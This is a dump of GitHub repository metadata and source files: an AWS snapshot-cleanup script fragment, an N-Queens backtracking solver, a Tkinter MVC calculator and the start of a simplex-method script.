list\nsnapshotList = ec2.describe_snapshots()\nfor snap in snapshotList['Snapshots']:\n\n # snapshot ID\n snapID = snap['SnapshotId']\n\n # snapshot descripton\n snapDescription = snap['Description']\n\n # if the snapshot description has \"backup_delete_on\"\n if snapDescription.split(\":\")[0] == \"backup_delete_on\":\n\n # get the snapshot date\n snap_date = datetime.strptime(snapDescription.split(\":\")[1], \"%Y-%m-%d\")\n\n # if the snapshot date is today, delete them\n if snap_date < todayDate:\n print \"Deleting snapshot: ID \"+snapID+\", Date \"+snapDescription.split(\":\")[1]\n print ec2.delete_snapshot(SnapshotId=snapID)\n print \"\"\n" } ]
2
Ryan-Red/N-Queens-CSP
https://github.com/Ryan-Red/N-Queens-CSP
b48d7d950f09815144fc129e3c8a9d6a765007e8
dc4ac885c48e2768d74b473d82777f14629d2d04
8a66e2c5e5cde336b9fa81ec1230f95a276deff0
refs/heads/main
2023-07-07T00:29:26.405845
2021-08-15T14:04:18
2021-08-15T14:04:18
396,370,576
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7810651063919067, "alphanum_fraction": 0.7810651063919067, "avg_line_length": 41.25, "blob_id": "c2b64244a99033a9c439029dd7821f9a5d10cd44", "content_id": "beaecd06fb3203be8617ada26b6c6c95cb7c6f8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 169, "license_type": "no_license", "max_line_length": 86, "num_lines": 4, "path": "/README.md", "repo_name": "Ryan-Red/N-Queens-CSP", "src_encoding": "UTF-8", "text": "# N-Queens-CSP\nThis is my quick and dirty N-Queens CSP solver in python that uses Backtracking search\n\nI plan to add in a way to solve the CSP using GAC Arc Consistency\n" }, { "alpha_fraction": 0.5429160594940186, "alphanum_fraction": 0.5635307431221008, "avg_line_length": 30.120481491088867, "blob_id": "b710540ec9ed73db28ba48790ed2977f5c9d4e4c", "content_id": "90b6e415a642d97e239430369f8b278072f9c3de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5336, "license_type": "no_license", "max_line_length": 157, "num_lines": 166, "path": "/N-QueensCSP.py", "repo_name": "Ryan-Red/N-Queens-CSP", "src_encoding": "UTF-8", "text": "\r\n############################################################################################\r\n#Constants!\r\n\r\nN = 8 #Size we are choosing\r\n\r\nQUEEN_SYMBOL = 2 #2 means queen, 0 means no queen\r\n\r\n############################################################################################\r\n\r\n\r\n\r\n#This is a list of all the queen's locations in each row. The value of 0 means nothing placed\r\nqueen_placed = [0 for i in range(0,N)]\r\n\r\n\r\n#This function is meant to scan if there is a queen present in a given row.\r\ndef scanForQueen(queens_array,row):\r\n column = 0\r\n for column in range(0,N):\r\n if (queens_array[row][column] == QUEEN_SYMBOL):\r\n queen_placed[row] = column + 1 # there is a queen in the row\r\n\r\n\r\n\r\n#diagonal constraint, make sure nothing is diagonal from the queens already placed.\r\ndef diagContraint(queens_array, new_row, new_column):\r\n\r\n i = 0\r\n queen_column = 0\r\n queen_row = 0\r\n #go through each row, if queen is present want to check if the new location is potentially diagonal from the queen we are looking at.\r\n for i in range(0,N):\r\n if(i == new_row):\r\n continue\r\n if(queen_placed[i] != 0):\r\n queen_row = i\r\n #this is the trick we had from before to save the queen's location and know if a queen is in the current row all at the same time.\r\n queen_column = queen_placed[i] - 1\r\n\r\n row_diff = abs(queen_row - new_row)\r\n col_diff = abs(queen_column - new_column)\r\n\r\n if(row_diff == col_diff):\r\n\r\n return False #constraint is not respected\r\n\r\n return True #all rows are safe\r\n\r\n\r\n#constraint to ensure nothing is in the same column\r\ndef colConstraint(queens_array, new_column):\r\n i = 0\r\n\r\n for i in range(0,N):\r\n if(queens_array[i][new_column] != 0):\r\n return False\r\n\r\n return True\r\n\r\n#constraint to ensure that no other queens are on the same row\r\ndef rowConstraint(queens_array, new_row):\r\n j = 0\r\n\r\n for j in range(0,N):\r\n if(queens_array[new_row][j] != 0):\r\n return False\r\n\r\n return True\r\n\r\n#The meat of the solution, this is the function that finds the optimal placement of the queens to solve this Constraint Satisfaction Problem (CSP)\r\ndef backTrackingSearch(queens_array,row):\r\n #If the current row is N, we know we made it to the end,\r\n if row == N:\r\n return True, queens_array\r\n\r\n #If there is a queen in the current row, pass.\r\n if(queen_placed[row] == 0):\r\n col = 0\r\n \r\n #Go through every possible position in the row\r\n for col in range(0,N):\r\n\r\n queen_placed[row] = 0 \r\n\r\n #check if all 3 constraints are satisfied\r\n if((rowConstraint(queens_array,row) == True) and (colConstraint(queens_array,col) == True) and (diagContraint(queens_array,row,col) == True)):\r\n #Set the queen at this row at the current position, saving it in 2 places \r\n queen_placed[row] = col + 1\r\n queens_array[row][col] = QUEEN_SYMBOL\r\n\r\n #Recursively go down to the next level in hopes of having found the \"right\" conbination\r\n ret = backTrackingSearch(queens_array,row +1)\r\n\r\n #If it returns true, we know that we made it to the end and as such can break out\r\n if ret[0] == True:\r\n return ret\r\n\r\n #Reset changes made and try again with another position if we didnt find a good path.\r\n queens_array[row][col] = 0\r\n queen_placed[row] = 0 \r\n else:\r\n #if the queen was already placed on this row, move on the the next one.\r\n ret = backTrackingSearch(queens_array,row +1)\r\n\r\n #If it returns true, we know that we made it to the end and as such can break out\r\n if ret[0] == True:\r\n return ret\r\n \r\n\r\n return False,queens_array\r\n\r\n#function that prints the board nicely \r\ndef printBoard(queens_array):\r\n for line in queens_array:\r\n print(line) \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#This is the function that runs things and calls the algo.\r\ndef main():\r\n \r\n #variables used for iteration\r\n i = 0\r\n j = 0\r\n\r\n\r\n\r\n #generate the queens array (the board we are playing on)\r\n queens_array = [[0 for i in range(0,N)] for j in range(0,N)]\r\n # queens_array = [[0,0,0,0,0,0,0,0], \r\n # [0,0,0,0,0,0,0,0],\r\n # [0,0,0,0,0,0,0,0],\r\n # [0,0,0,0,0,0,0,0],\r\n # [0,0,0,0,0,0,0,0], \r\n # [0,0,0,0,0,0,0,0],\r\n # [0,0,0,0,0,0,0,0],\r\n # [0,0,0,0,0,0,0,0]] \r\n\r\n\r\n\r\n #we can place a queen wherever we want, this is only to be used when the prof selects the location for the queen. You can get rid of this and it'll work.\r\n queens_array[3][2] = QUEEN_SYMBOL\r\n\r\n #have it scan over the array and just save the position of the queen, wherever it is just so we can access it easier \r\n for i in range(0,N):\r\n scanForQueen(queens_array,i)\r\n\r\n\r\n \r\n #start the algorithm at the beginning of the board (0th row)\r\n ret = backTrackingSearch(queens_array,0)\r\n\r\n \r\n #get the returned \"solved\" board\r\n queens_array = ret[1]\r\n\r\n #this is my function to print it out\r\n printBoard(queens_array)\r\n\r\n\r\n\r\nmain()\r\n\r\n" } ]
2
HoangNKQ/CalculatorApp
https://github.com/HoangNKQ/CalculatorApp
04f96130a5321fb9b7312e2d5274a1006ac65b94
7a47431484f7f7144155a427d9d7f717644fa638
3471043cd1e119002f238be653c0acd7c572fda1
refs/heads/master
2023-08-13T09:34:52.576272
2021-09-29T12:03:55
2021-09-29T12:03:55
411,625,213
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5307336449623108, "alphanum_fraction": 0.5512227416038513, "avg_line_length": 27.828571319580078, "blob_id": "80d8ae3917c759f24098711d2c913c3009224742", "content_id": "4dc0786d043fcb634b61ced52e91f82d27dad4ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3026, "license_type": "no_license", "max_line_length": 101, "num_lines": 105, "path": "/calculator/view.py", "repo_name": "HoangNKQ/CalculatorApp", "src_encoding": "UTF-8", "text": "import tkinter as tk\nfrom tkinter import ttk\n\n\nclass View(tk.Tk):\n def __init__(self):\n super().__init__()\n #self.controller = controller\n\n self.title ('Calculator')\n self.geometry('400x500')\n self.tk.call(\"source\", \"theme\\sun-valley.tcl\")\n self.tk.call(\"set_theme\", \"light\")\n\n self.button_text = ''\n self.expression_text = ''\n self.setup_frame()\n self.init_frame()\n \n\n def setup_frame(self):\n self.rowconfigure(0, weight = 1)\n self.rowconfigure(1, weight = 6)\n self.columnconfigure(0, weight = 1)\n #self.columnconfigure(1, weight = 1)\n\n\n def init_frame(self):\n expression = self.create_expression_frame(self)\n expression.grid(row= 0, column = 0, sticky= 'nsew', padx= 5, pady= 5)\n button = self.create_button_frame(self)\n button.grid(row= 1, column = 0, sticky= 'nsew', padx= 5, pady= 5)\n\n\n def create_expression_frame(self, parent):\n expression_frame = ttk.Frame(parent)\n expression_frame.rowconfigure(0, weight = 1)\n expression_frame.rowconfigure(1, weight = 4)\n expression_frame.columnconfigure(0, weight = 1)\n\n self.equation_label = ttk.Label(expression_frame, text= \"equation\", font=('Arial', 10))\n self.equation_label.grid(row= 0, column= 0, sticky= 'e', padx= 5, pady= 5)\n\n self.result_label = ttk.Label(expression_frame, text= \"Result\", font=('Arial', 30))\n self.result_label.grid(row= 1, column= 0, sticky = 'e', padx= 5, pady= 5)\n\n return expression_frame\n\n def history(self):\n pass\n\n def insert_expression(self, expression_text):\n self.equation_label.configure(text= expression_text)\n\n def insert_result(self, result_text):\n self.result_label.configure(text= result_text)\n\n\n\n def create_button_frame(self, parent):\n # Variables\n self.buttons = []\n button_text = [\n '(',')','C','+',\n '7','8','9','-',\n '4','5','6','*',\n '1','2','3','/',\n '+/-','0','.','='\n ]\n button_count = -1\n rows = 5\n\n # Button Frame\n button_frame = ttk.Frame(parent) \n s = ttk.Style()\n s.configure('TButton', font=('Arial', 14))\n\n # Grid management\n for i in range(rows):\n if i < 4:\n button_frame.columnconfigure(i, weight = 1)\n button_frame.rowconfigure(i, weight = 1)\n \n #Create button and save to list 'buttons'\n for i in range(5):\n for j in range(4):\n button_count += 1\n self.buttons.append(ttk.Button(button_frame, text= button_text[button_count]))\n self.buttons[button_count].grid(row = i, column = j, sticky='nsew', padx= 2, pady= 2)\n\n return button_frame\n\n\n\n def init_display(self):\n self.mainloop()\n\n\ndef main():\n view = View()\n view.init_display()\n view.button_trigger()\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.5168309807777405, "alphanum_fraction": 0.5202311873435974, "avg_line_length": 22.910568237304688, "blob_id": "509bdb35dddaafa76ecafc1bdb2814b511c59016", "content_id": "87073b993e8885f888bfe3e86bf997ff17096774", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2941, "license_type": "no_license", "max_line_length": 102, "num_lines": 123, "path": "/calculator/controller.py", "repo_name": "HoangNKQ/CalculatorApp", "src_encoding": "UTF-8", "text": "\nfrom view import View\n\nclass Controller:\n\n input_text = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '.', '(', ')', '+', '-', '*', '/']\n \n def __init__(self):\n self.view = View()\n\n self.is_new_expression = True\n self.is_result = False\n self.expression = ''\n self.result = ''\n\n self.setup_button()\n \n \n def setup_button(self):\n '''\n Assign command to all buttons \n '''\n for btn in self.view.buttons:\n btn['command'] = (lambda txt = btn['text'] : self.button_action(txt))\n\n\n\n def button_action(self, button_name):\n '''\n Perform function accordingly whenever a button is clicked\n '''\n # print(text)\n if button_name in self.input_text:\n self.input(button_name)\n\n if button_name == '=':\n self.equal()\n \n if button_name == 'C':\n self.clear_calculator()\n \n\n\n def input(self, button):\n '''\n Function performed when an input button is clicked\n '''\n if button not in ['+', '-', '*', '/']:\n self.save_expression(button)\n else:\n self.operator()\n self.save_expression(button)\n self.view.insert_expression(self.expression)\n\n\n def save_expression(self, text):\n '''\n Save input expression\n '''\n # print(self.new_expression)\n if self.is_new_expression:\n self.expression = text\n self.is_new_expression = False\n else:\n self.expression += text\n\n\n def operator(self):\n if self.is_result:\n self.expression = self.result\n self.is_new_expression = False\n self.is_result = False\n else:\n self.is_new_expression = False\n\n\n\n def equal(self):\n '''\n Function performed when equal button is clicked\n '''\n self.evaluate(self.expression)\n # self.view.insert_result(self.result)\n self.is_new_expression = True\n self.is_result = True\n\n\n def evaluate(self, expression):\n '''\n Calculate the result of entered expression\n '''\n try:\n self.result = str(eval(expression))\n self.view.insert_result(self.result)\n except SyntaxError:\n self.view.insert_result('Syntax Error')\n self.is_new_expression = True\n self.is_result = False\n\n\n\n\n def clear_calculator(self):\n '''\n Function performed when Clear button is clicked\n '''\n self.is_new_expression = True\n self.result = ''\n self.expression = ''\n self.view.insert_result(self.result)\n self.view.insert_expression(self.expression)\n\n\n def start_app(self):\n self.view.init_display()\n\n\ndef main():\n controller = Controller()\n controller.start_app() \n\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.7804877758026123, "alphanum_fraction": 0.7804877758026123, "avg_line_length": 40, "blob_id": "8d74bd7408d20174b83002243e6edd8b82f21b37", "content_id": "ed3534298cd428758d7a4e8367b03fe5d81e4f3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 41, "license_type": "no_license", "max_line_length": 40, "num_lines": 1, "path": "/README.md", "repo_name": "HoangNKQ/CalculatorApp", "src_encoding": "UTF-8", "text": "## Calculator App with Tkinter using MVC\n" }, { "alpha_fraction": 0.5411764979362488, "alphanum_fraction": 0.5411764979362488, "avg_line_length": 14.545454978942871, "blob_id": "e75dc33097a4013eaf1149b8db9daee5713f0d3c", "content_id": "29b38a35e70cdfe260892367e1dccdfd7a497074", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 170, "license_type": "no_license", "max_line_length": 37, "num_lines": 11, "path": "/calculator/model.py", "repo_name": "HoangNKQ/CalculatorApp", "src_encoding": "UTF-8", "text": "class Model:\n def calculate(self, text):\n self.result = str(eval(text))\n return self.result\n\n\ndef main():\n pass\n\nif __name__ == '__main__':\n main()" } ]
4
HarsheetKakar/BC-dashboard
https://github.com/HarsheetKakar/BC-dashboard
c9d0c7c098082928304ee13ce920d5a5a614b40b
caff68486221b947918f138867d5a0c54115463e
96dd4a217baa3606c8f0147342a3dfc9fbdc5ddb
refs/heads/master
2020-04-05T07:52:00.727568
2018-11-08T10:46:04
2018-11-08T10:46:04
156,691,091
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6502242088317871, "alphanum_fraction": 0.6681614518165588, "avg_line_length": 20.299999237060547, "blob_id": "70a037275bf42748fdd449e101dfac37dae94935", "content_id": "72a063b06dba552359081d77324674dc23b00d4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 41, "num_lines": 10, "path": "/server.py", "repo_name": "HarsheetKakar/BC-dashboard", "src_encoding": "UTF-8", "text": "import dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\n\r\napp= dash.Dash(__name__)\r\n\r\napp.layout=html.Div('Hello World')\r\n\r\nif __name__==\"__main__\":\r\n app.run_server(debug=True, port=5000)\r\n" } ]
1
Hackman-git/Spectral-clustering
https://github.com/Hackman-git/Spectral-clustering
8596d9f42df861cc3c5e5c789526ee2e8244005e
f07064c86cf37493c10a8d08434e95ed178b2cc4
9f5b7ac674e67b4a1c683d681c5fdd3cb2a0f74b
refs/heads/master
2021-01-08T06:20:21.504043
2020-02-20T16:56:31
2020-02-20T16:56:31
241,939,333
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6545372009277344, "alphanum_fraction": 0.6863770484924316, "avg_line_length": 25.981595993041992, "blob_id": "a5fa81f817cf318e55adac8ffc872d245d4b3c69", "content_id": "50d67de8993c975ee2c2b6fd717cb3c1f155c27a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4397, "license_type": "no_license", "max_line_length": 112, "num_lines": 163, "path": "/SpectralClustering.py", "repo_name": "Hackman-git/Spectral-clustering", "src_encoding": "UTF-8", "text": "'''\nName: Olugbenga Abdulai\nCWID: A20447331\n'''\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport sklearn.cluster as cluster\nimport sklearn.neighbors as nbrs\nimport math\n\n'''\n3(a)\n'''\n# reading data\ndata = pd.read_csv(r\"C:\\Users\\abdul\\Desktop\\CS 584\\HW\\HW 2\\FourCircle.csv\")\n\n# scatterplot\nplt.figure(figsize=[8,8])\nsns.scatterplot(x=data['x'], y=data['y'], data=data)\nplt.show()\n\n'''\nThere are four clusters\n'''\n\n'''\n3(b)\n'''\ntrain_data = data[['x', 'y']]\nkmeans = cluster.KMeans(n_clusters=4, random_state=60616).fit(train_data)\ndata['kmean_cluster'] = kmeans.labels_\n\n# scatter plot\nplt.figure(figsize=[8,8])\nsns.scatterplot(x=data['x'], y=data['y'], hue=data.kmean_cluster)\nplt.show()\n\n# observations for each cluster\nfor i in range(4):\n print(\"\\ncluster label \", i)\n print(data.loc[data.kmean_cluster == i])\n\n'''\nThe kmeans algorithm separates cluster 0 and cluster 1 along the x-axis. i.e. cluster 0 has x-values\nranging roughly from 0-10 while cluster 1 has x-values ranging from -10 to 0. The algorithm separates cluster 2\nand cluster 3 along the y-axis with y-values for cluster 2 ranging roughly from 3-10 and y-values for cluster 3 \nranging from -3 to -10. The result is a cluster chart resembling a pie chart split in four segments.\n'''\n\n'''\n3(c)\n'''\n'''\nThis function prints the adjacency matrix, degree matrix, laplacian matrix and \nreturns the eigenvalues and eigenvectors from the laplacian matrix of spectral\nclustering analysis.Takes the number of neighbors as input\n'''\ndef eigenval_eigenvec(n):\n knn = nbrs.NearestNeighbors(n_neighbors=n, algorithm=\"brute\", metric='euclidean')\n knn_fit = knn.fit(train_data)\n d, i = knn_fit.kneighbors(train_data)\n\n # distances among observations\n dist = nbrs.DistanceMetric.get_metric('euclidean')\n distances = dist.pairwise(train_data)\n\n # adjacency matrix\n n_obs = data.shape[0]\n adj = np.zeros((n_obs, n_obs))\n for r in range(n_obs):\n for j in i[r]:\n adj[r, j] = math.exp(-(distances[r][j]) ** 2)\n\n # making the adjacency matrix symmetric\n adj = 0.5 * (adj + adj.transpose())\n print(\"\\nadjacency matrix:\\n\", adj)\n\n # Degree matrix\n degree = np.zeros((n_obs, n_obs))\n for j in range(n_obs):\n s = 0\n for k in range(n_obs):\n s += adj[j, k]\n degree[j, j] = s\n\n print(\"\\ndegree matrix:\\n\", degree)\n\n # Laplacian matrix\n laplacian = degree - adj\n print(\"\\nlaplacian matrix:\\n\", laplacian)\n\n # eigenvalues and eigenvectors of laplacian matrix\n from numpy import linalg as lin\n evals, evecs = lin.eigh(laplacian)\n\n print(\"\\nfirst seven eigenvalues with {} nearest neighbors: \\n\".format(n), evals[:8])\n return (evals, evecs)\n\n# trying various values for number of neighbors\nfor j in range(1,16):\n print(eigenval_eigenvec(j))\n\n'''\nFrom the eigenvalues analysis and our visual inspection that we require 4 clusters, we can see that\na minimum of 6 nearest neighbors is needed to correctly achieve 4 clusters. Let us confirm this with\nthe eigenvalue plot\n'''\ndef plot_eigen_values(evals):\n # determining number of clusters with 7 smallest eigenvalues\n seq = np.arange(1,8,1)\n plt.figure(figsize=[8,8])\n sns.scatterplot(x=seq, y=evals[0:7,])\n plt.xticks(seq)\n plt.grid('both')\n plt.show()\n\nevals, evecs = eigenval_eigenvec(6)\nplot_eigen_values(evals)\n\n'''\n3(d)\n'''\n# with 6 nearest neighbors\nevals, evec = eigenval_eigenvec(6)\n\nprint('\\neigenvalues for 6 nearest neighbors: ', evals[:4])\n'''\nThere are four eigenvalues that are practically zero\nIn scientific notation, \n[-1.24369 x 10^-15, 1.4879 x 10^-16, 4.4804 x 10^-16, 2.9175 x 10^-15]\n'''\n\n'''\n3(e)\n'''\n# determining the 'practical' number of neighbors\n# plotting the first 20 eigenvals\nseq = np.arange(1,21,1)\nplt.figure(figsize=[8,8])\nsns.scatterplot(x=seq, y=evals[0:20,])\nplt.xticks(seq)\nplt.grid('both')\nplt.show()\n\n'''\nThe first 'jump' occurs at the 10th eigenvalue so we choose\n10 as our optimal number of nearest neighbors\n'''\nevals, evec = eigenval_eigenvec(10)\nz = evecs[:, [0,1,2,3]]\n\n# 4-cluster k-mean on first four eigenvectors\nkmeans_spectral = cluster.KMeans(n_clusters=4, random_state=60616).fit(z)\ndata['spectral_cluster'] = kmeans_spectral.labels_\n\n# scatter plot\nplt.figure(figsize=[8,8])\nsns.scatterplot(x=data['x'], y=data['y'], hue=data['spectral_cluster'])\nplt.grid()\nplt.show()" }, { "alpha_fraction": 0.7861975431442261, "alphanum_fraction": 0.7963464260101318, "avg_line_length": 122.16666412353516, "blob_id": "db681138a631e0dc65091418f0125a6e30a1d193", "content_id": "d12a4ff39235c39063e59c6f0e41f3eb3001959f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1486, "license_type": "no_license", "max_line_length": 345, "num_lines": 12, "path": "/README.md", "repo_name": "Hackman-git/Spectral-clustering", "src_encoding": "UTF-8", "text": "# Spectral-clustering\nApply the Spectral Clustering method to the FourCircle.csv. Your input fields are x and y. Wherever needed, specify random_state = 60616 in calling the KMeans function.\n\na)\t(5 points) Plot y on the vertical axis versus x on the horizontal axis. How many clusters are there based on your visual inspection?\n\nb)\t(5 points) Apply the K-mean algorithm directly using your number of clusters that you think in (a). Regenerate the scatterplot using the K-mean cluster identifiers to control the color scheme. Please comment on this K-mean result.\n\nc)\t(10 points) Apply the nearest neighbor algorithm using the Euclidean distance. We will consider the number of neighbors from 1 to 15. What is the smallest number of neighbors that we should use to discover the clusters correctly? Remember that we may need to try a couple of values first and use the eigenvalue plot to validate our choice.\n\nd)\t(5 points) Using your choice of the number of neighbors in (c), calculate the Adjacency matrix, the Degree matrix, and finally the Laplacian matrix. How many eigenvalues do you determine are practically zero? Please display their calculated values in scientific notation.\n\ne)\t(10 points) Apply the K-mean algorithm on the eigenvectors that correspond to your “practically” zero eigenvalues. The number of clusters is the number of your “practically” zero eigenvalues. Regenerate the scatterplot using the K-mean cluster identifier to control the color scheme.\n" } ]
2
marc-ashman/ios2droid
https://github.com/marc-ashman/ios2droid
8b9a1793943d5f185d2ad3a4565292a8460b8ec9
329f26a3cd8339a299e9eb32c8eaeb6354297e08
4642132601740fd79a2c6d7e6ad68dda89d55e3d
refs/heads/master
2015-08-13T19:03:58.872216
2014-10-03T07:43:41
2014-10-03T07:43:41
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6071428656578064, "alphanum_fraction": 0.6149396300315857, "avg_line_length": 28.6641788482666, "blob_id": "c2790dea38e81c2bd6cd751dc1eb5c6c7e3ab452", "content_id": "127a22d0b99ae1ce6c3c25d43f036558cf6aeac4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3976, "license_type": "no_license", "max_line_length": 89, "num_lines": 134, "path": "/ios2droid.py", "repo_name": "marc-ashman/ios2droid", "src_encoding": "UTF-8", "text": "from shutil import copyfile\nimport os\nimport re\n\n###\n# Class Def\n###\n\nclass Density:\n def __init__(self, name, sortorder, filepath, ios_str):\n self.name = name\n self.sortorder = sortorder\n self.filepath = filepath\n self.ios_str = ios_str\n def __repr__(self):\n return self.name\n\n###\n# Constants\n###\n\nXXXHDPI_PATH = \"res/drawable-xxxhdpi/\"\nXXHDPI_PATH = \"res/drawable-xxhdpi/\"\nXHDPI_PATH = \"res/drawable-xhdpi/\"\nHDPI_PATH = \"res/drawable-hdpi/\"\nMDPI_PATH = \"res/drawable-mdpi/\"\nLDPI_PATH = \"res/drawable-ldpi/\"\n\nXXXHDPI = Density(\"XXXHDPI\", 6, XXXHDPI_PATH, [\"@4x\"])\nXXHDPI = Density(\"XXHDPI\", 5, XXHDPI_PATH, [\"@3x\"])\nXHDPI = Density(\"XHDPI\", 4, XHDPI_PATH, [\"@2x\"])\nHDPI = Density(\"HDPI\", 3, HDPI_PATH, [\"@150x\", \"@1.5x\", \"@15x\"])\nMDPI = Density(\"MDPI\", 2, MDPI_PATH, [\"@1x\"])\nLDPI = Density(\"LDPI\", 1, LDPI_PATH, [\"@.75x\", \"@75x\"])\n\nDENSITIES = [ XXXHDPI, XXHDPI, XHDPI, HDPI, MDPI, LDPI ]\n\n###\n# Methods\n###\n\ndef remove_size_info(filename):\n newname = filename\n for density in DENSITIES:\n for str in density.ios_str:\n newname = newname.replace(str, \"\")\n return newname\n\ndef clean_filename(filename):\n file = remove_size_info(filename)\n file = file.replace(\"-\", \"_\")\n file = re.sub(r'[^a-z0-9_\\.]+', '', file.lower())\n return file\n \ndef add_to_dict_value_list(dict, key, item):\n if key in dict:\n dict[key].append(item)\n else:\n dict[key] = list()\n dict[key].append(item)\n \n###\n# Script\n###\n \n# used to record files and the found densities\nfound_files = dict()\nfiles_to_copy = list()\n\n# go through all files in the current directory, and process images\nfor file in os.listdir(\".\"):\n if file.endswith(\".png\") or file.endswith(\".jpg\") or file.endswith(\".gif\"):\n density_found = False\n for density in DENSITIES:\n for search_str in density.ios_str:\n if file.find(search_str) != -1:\n density_found = True\n files_to_copy.append((file, density.filepath + clean_filename(file)))\n add_to_dict_value_list(found_files, remove_size_info(file), density)\n break\n if not density_found:\n files_to_copy.append((file, MDPI.filepath + clean_filename(file)))\n add_to_dict_value_list(found_files, remove_size_info(file), MDPI)\n \n# get list of used densities and sort it\nused_densities = set()\nfor key, value in found_files.items():\n densities = set(value)\n used_densities = used_densities | densities\nsorted_used_densities = sorted(used_densities, key=lambda x: x.sortorder)\n\n# make folders of needed densities\nfor density in used_densities:\n if not os.path.exists(density.filepath):\n os.makedirs(density.filepath)\n \n# perform copying\nfor copy in files_to_copy:\n copyfile(copy[0], copy[1])\n\n# prepare formatting for report\nformat_str = '{0:40}'\nfirst_line = list()\nfirst_line.append('FILENAME')\nsecond_line = list()\nsecond_line.append('------------------')\nfor i in range(len(used_densities)):\n format_str += ' {' + str(i+1) + \":7}\"\n first_line.append(sorted_used_densities[i].name)\n second_line.append('----')\n \n# print report\nprint(format_str.format(*first_line))\nprint(format_str.format(*second_line))\nfor key in sorted(found_files.keys()):\n value = found_files[key]\n exists = dict()\n densities_for_file = set(value)\n densities_for_file = [x for x in densities_for_file if x in sorted_used_densities]\n \n # set default values to empty string\n for density in DENSITIES:\n exists[density] = \"\"\n \n # mark those found as density\n str_exists = list()\n for density in sorted_used_densities:\n if density in densities_for_file:\n str_exists.append(\"X\")\n else:\n str_exists.append(\"\")\n \n # Don't know python enough to write this in a better way\n print(format_str.format(key, *str_exists))\n\n" }, { "alpha_fraction": 0.6764518022537231, "alphanum_fraction": 0.6968730092048645, "avg_line_length": 22.388059616088867, "blob_id": "59364d36abc3f1b7a5382a49e2062d9f12e41c02", "content_id": "cfc511426823b5be0f41fcecf7a2d3b6f1c8cea3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1567, "license_type": "no_license", "max_line_length": 157, "num_lines": 67, "path": "/README.md", "repo_name": "marc-ashman/ios2droid", "src_encoding": "UTF-8", "text": "ios2droid\n=========\n\nIOS 2 Droid Drawable Organizer\n\n\nMany designers I work with often leave all mobile project assets in a single folder, and with ios image filename style (@2x, @3x, ...)\n\nBeing the lazy person I am, I got sick of renaming files and moving them in the right folders and made this. If your designers are like mine, enjoy the tool.\n\nWhat Will Happen\n================\n\n1. Dashes (-) will be replaced with underscores (_) \n2. Uppercase characters will be replaced with lowercase\n3. All invalid characters will be removed. No protection is provided to prevent overriding.\n4. Files will be copied to their corresponding folders:\n - @.75x or @75x -> res/drawable-ldpi/\n - @1x or no @_x in file name -> res/drawable-mdpi/\n - @1.5x, @15x or @150x -> res/drawable-hdpi/\n - @2x -> res/drawable-xhdpi/\n - @3x -> res/drawable-xxhdpi/\n - @4x -> res/drawable-xxxhdpi/\n\nExample\n=======\n\n**Input**\n<pre>\napp_logo.png\[email protected]\[email protected]\[email protected]\[email protected]\nbutton-bg.png\[email protected]\ninvalid-characters-$#[email protected]\ninvalid-characters-$#[email protected]\n</pre>\n\n**Output**\n<pre>\nres/\n drawable-mdpi/\n app_logo.png\n button-bg.png\n invalid_characters__inside.png\n drawable-hdpi/\n app_logo.png\n drawable-xhdpi/\n app_logo.png\n button_bg.png\n invalid_characters__inside.png\n drawable-xxhdpi/\n app_logo.png\n drawable-xxxhdpi/\n app_logo.png\n</pre>\n\nHow to Use\n==========\n\nPlace the script in the folder with all your ios named assets, and run:\n\npython ios2droid\n\nCopy the new res folder over to your project.\n" } ]
2
sscheele/simplex-algo
https://github.com/sscheele/simplex-algo
d3b61d1c619efacf832b2749f72e746303d2ac03
40ff8486053a5e030ea7036a9c378afca8790b40
fedec2b37ccfc254ddcce017e1fe4047d59aa329
refs/heads/master
2021-01-25T09:20:26.865550
2017-06-09T03:17:57
2017-06-09T03:17:57
93,814,247
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5511603355407715, "alphanum_fraction": 0.5901898741722107, "avg_line_length": 28.169231414794922, "blob_id": "212ed8d12b7456e0001d60b5f8ef377cbac207dc", "content_id": "336cb5eab0a9efa6ef44801915dfd3bad2c3731c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1896, "license_type": "no_license", "max_line_length": 88, "num_lines": 65, "path": "/main.py", "repo_name": "sscheele/simplex-algo", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport numpy as np\n\nnp.set_printoptions(suppress=True, linewidth=300)\n\n#the last n-1 rows are considered to be <=, the 0th is our optimization\nconstraint_matrix = np.array(\n [[13.0, 23.0, 0.0],\n [5.0, 15.0, 480.0],\n [4.0, 4.0, 160.0],\n [35.0, 20.0, 1190.0]]\n )\n\nfinal_col = constraint_matrix[:, -1]\nconstraint_matrix = constraint_matrix[:, :-1]\n\n#add in our slack variables\nfor i, _ in enumerate(constraint_matrix):\n tmp = []\n for _ in range(i):\n tmp.append(0)\n tmp.append(-1 if i == 0 else 1)\n for _ in range(len(constraint_matrix)-i-1):\n tmp.append(0)\n constraint_matrix = np.append(constraint_matrix, np.array([tmp]).T, 